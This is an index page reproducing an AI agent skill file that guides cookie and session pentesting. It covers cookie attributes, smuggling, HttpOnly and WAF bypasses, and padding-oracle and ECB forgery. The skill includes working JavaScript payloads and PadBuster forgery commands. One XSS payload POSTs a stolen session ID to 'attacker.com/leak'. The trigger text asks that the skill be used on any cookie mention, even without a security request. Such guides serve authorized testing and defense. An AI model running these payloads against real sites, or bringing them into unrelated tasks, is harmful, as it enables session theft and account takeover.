OpenSkillIndex← back to search

Hacktricks-skills cookie-pentest

Use this skill whenever testing web applications for cookie vulnerabilities, analyzing session management, or investigating authentication bypasses. Trigger on any mention of cookies, sessions, authentication tokens, CSRF, SameSite, HttpOnly, Secure flags, cookie smuggling, or web security testing. Make sure to use this skill for any cookie-related security assessment, even if the user doesn't explicitly mention 'pentesting' or 'vulnerability'.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/hacking-with-cookies/hacking-with-cookies/SKILL.MD
source content

Cookie Pentesting Skill

A comprehensive guide for testing cookie-based authentication and session management vulnerabilities in web applications.

When to Use This Skill

Use this skill when:

  • Analyzing cookie attributes and flags for security issues
  • Testing for session hijacking, fixation, or donation attacks
  • Investigating cookie smuggling or parsing vulnerabilities
  • Checking for WAF bypass opportunities via cookie manipulation
  • Testing cookie encryption/encoding for weaknesses
  • Assessing SameSite, HttpOnly, and Secure flag effectiveness
  • Performing cookie-based authentication bypass testing

Quick Reference: Cookie Attributes

AttributePurposeSecurity Consideration
Expires
Cookie expiry datePrefer 
Max-Age
for modern practice
Max-Age
Seconds until deletionMore reliable than 
Expires
Domain
Hosts that receive cookieAvoid overly broad domains
Path
URL path requirementUse specific paths, not 
/
SameSite
Third-party request controlAlways set to 
Strict
or 
Lax
HttpOnly
Blocks JavaScript accessEssential for session cookies
Secure
HTTPS-only transmissionRequired for sensitive cookies

SameSite Behavior Matrix

Request TypeNotSet*LaxNone
Link (
<a href>
)
Form GET
Form POST
iframe
AJAX
Image

*Chrome 80+ defaults to Lax for cookies without SameSite

Cookie Prefix Security

__Secure-
Prefix

  • Must be set with 
    Secure
    flag
  • Must originate from HTTPS
  • Prevents downgrade attacks

__Host-
Prefix (Stricter)

  • Must be set with 
    Secure
    flag
  • Must originate from HTTPS
  • Cannot specify Domain (prevents subdomain transmission)
  • Path must be 
    /
  • Isolates application cookies from subdomains

Common Cookie Vulnerabilities

1. Session Hijacking

What to check:

  • Can cookies be intercepted (missing 
    Secure
    flag)?
  • Are cookies accessible via JavaScript (missing 
    HttpOnly
    )?
  • Is there XSS that could exfiltrate cookies?

Test:

# Check cookie flags in browser dev tools
# Look for missing Secure/HttpOnly flags

2. Session Fixation

What to check:

  • Does the application regenerate session ID after login?
  • Can you set a cookie before login and use it after?

Test:

  1. Set a known cookie value
  2. Log in with that cookie
  3. Check if the same cookie is accepted post-login

3. Cookie Smuggling

What to check:

  • Server parsing inconsistencies (RFC2109 vs RFC6265)
  • Double-quoted values with embedded semicolons
  • Unicode whitespace in cookie names

Test payloads:

// Unicode whitespace prefix forgery
document.cookie = `${String.fromCodePoint(0x2000)}__Host-name=injected; Domain=.example.com; Path=/;`;

// Legacy $Version=1 parsing
document.cookie = `$Version=1,__Host-name=injected; Path=/somethingreallylong/; Domain=.example.com;`;

// Cookie smuggling with quotes
RENDER_TEXT="hello world; JSESSIONID=13371337; ASDF=end";

4. HttpOnly Bypasses

What to check:

  • Does any endpoint echo session ID in response?
  • Is TRACE method enabled (Cross-Site Tracking)?
  • Can you use Cookie Smuggling to exfiltrate?

XSS payload for response-based bypass:

// Extract session from response
const re = /<!-- startscrmprint -->([\s\S]*?)<!-- stopscrmprint -->/;
fetch('/index.php?module=Touch&action=ws')
  .then(r => r.text())
  .then(t => { 
    const m = re.exec(t); 
    if (m) fetch('https://attacker.com/leak', {method:'POST', body: JSON.stringify({leak: btoa(m[1])})}); 
  });

5. Cookie Sandwich Attack

Requirements:

  • A cookie reflected in response
  • XSS capability

Steps:

document.cookie = `$Version=1;`;
document.cookie = `param1="start;`;
// Legit cookie gets trapped here
document.cookie = `param2=end";`;

6. WAF Bypasses

Quoted-string encoding

// Bypass value analysis
eval('test') => forbidden
"\e\v\a\l\(\'\t\e\s\t\'\)" => allowed

Cookie splitting

Cookie: name=eval('test//
Cookie: comment')
// Result: name=eval('test//, comment')

Comma separator (RFC2109)

$Version=1; foo=bar, abc = qux
// Creates: foo=bar AND admin=qux (spaces trimmed)

7. Encryption Weaknesses

Padding Oracle (CBC Mode)

Detection:

  • Cookie changes predictably with input changes
  • Different error messages for valid/invalid decryption

Tool: PadBuster

# Basic usage
padbuster <URL> <COOKIE> <PAD[8-16]>

# With cookies parameter
padbuster http://web.com/index.php u7bvLewln6PJPSAbMb5pFfnCHSEd6olf 8 -cookies auth=u7bvLewln6PJPSAbMb5pFfnCHSEd6olf

# Decrypt and forge
padbuster http://web.com/index.php <cookie> 8 -cookies thecookie=<cookie> -plaintext user=administrator

ECB Mode Detection

Test:

  1. Create user with repeated characters: 
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  2. Check for repeating patterns in cookie (block size)
  3. If found, you can swap blocks to forge cookies

Example:

  • Encrypt 
    a
    * block_size = pattern X
  • Create 
    a
    * block_size + 
    admin
  • Remove pattern X, append 
    admin
    block

CBC-MAC Forgery

Attack pattern:

  1. Get signature of 
    administ
    = 
    t
  2. Get signature of 
    rator\x00\x00\x00 XOR t
    = 
    t'
  3. Set cookie: 
    administrator + t'

8. Static-Key Cookie Forgery

What to check:

  • Cookie encrypts only predictable values (user ID)
  • Same key used across all users
  • No anti-replay properties

Test:

  1. Get your own cookie
  2. Determine cipher/encoding (hex, base64)
  3. Try encrypting your user ID with common keys
  4. If it matches, forge cookies for other IDs (e.g., ID=1 for admin)

Testing Checklist

Basic Checks

  • Cookie changes on logout
  • Cookie changes after password change
  • Cookie contains readable/decodable data
  • Same cookie works across devices
  • "Remember me" cookie behavior
  • Multiple accounts show cookie patterns

Advanced Checks

  • Create similar usernames to guess algorithm
  • Brute-force cookie bits
  • Test Padding Oracle with PadBuster
  • Check for ECB patterns
  • Test CBC-MAC forgery
  • Attempt static-key forgery

Attribute Checks

  • Secure
    flag present on sensitive cookies
  • HttpOnly
    flag present on session cookies
  • SameSite
    set to 
    Strict
    or 
    Lax
  • Domain
    not overly broad
  • Path
    is specific, not 
    /
  • Max-Age
    or 
    Expires
    set appropriately

Tools and Scripts

Use the bundled scripts for common tasks:

scripts/cookie-analyzer.py

Analyze cookie attributes and identify security issues.

scripts/cookie-encoding.py

Encode/decode cookie values (base64, hex, URL-safe).

scripts/cookie-forgery-test.py

Test for static-key cookie forgery vulnerabilities.

References

Methodology

  1. Reconnaissance: Identify all cookies and their attributes
  2. Attribute Analysis: Check flags, prefixes, and settings
  3. Manipulation Testing: Try modifying cookie values
  4. Smuggling Tests: Test parsing inconsistencies
  5. Encryption Analysis: Check for weak encryption patterns
  6. WAF Bypass: Test cookie-based bypass techniques
  7. Documentation: Record all findings and proof of concept

Important Notes

  • Always test in authorized environments only
  • Document all findings with evidence
  • Consider browser differences in cookie handling
  • Server-side parsing may differ from browser behavior
  • Unicode and encoding issues are common attack vectors
  • Modern browsers have improved cookie security (Chrome 80+ SameSite defaults)
  • Test across multiple browsers for comprehensive coverage